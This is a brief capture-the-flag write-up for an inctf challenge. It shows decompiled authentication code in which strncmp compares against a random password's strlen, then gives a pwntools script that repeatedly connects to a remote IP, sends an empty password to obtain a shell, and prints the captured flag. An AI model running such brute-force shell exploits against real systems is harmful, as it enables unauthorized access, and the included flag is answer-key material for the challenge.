Tags: string-format 

Rating: 0

This seems to be a very simple challenge. I'm not sure why this was classified as medium.

The authenticate function looked like:

```
v2 = __readfsqword(0x28u);
puts("Enter password");
get_inp(&s1, 1024);
n = strlen(password);
if ( !strncmp(&s1, password, n) )
system("sh");
```

The `password` was being read from `/dev/urandom`. There is a 1/256 chance that the first character is `NULL`. Simply sending empty strings as password gets you a shell.

```
from pwn import *
context.log_level = 'error'
for i in range(1000):
conn = remote("18.224.57.15", 1337)
conn.recvuntil(">>> ")
conn.sendline("1")
conn.recvuntil("password\n")
conn.sendline("")
conn.sendline("whoami")
print(i)
if "Enter" not in conn.recvline():
print("pwned")
conn.interactive()
conn.close()
```

Flag: `inctf{sp1r1t3d_n0te_t0_uns3cur3_the_p4d}`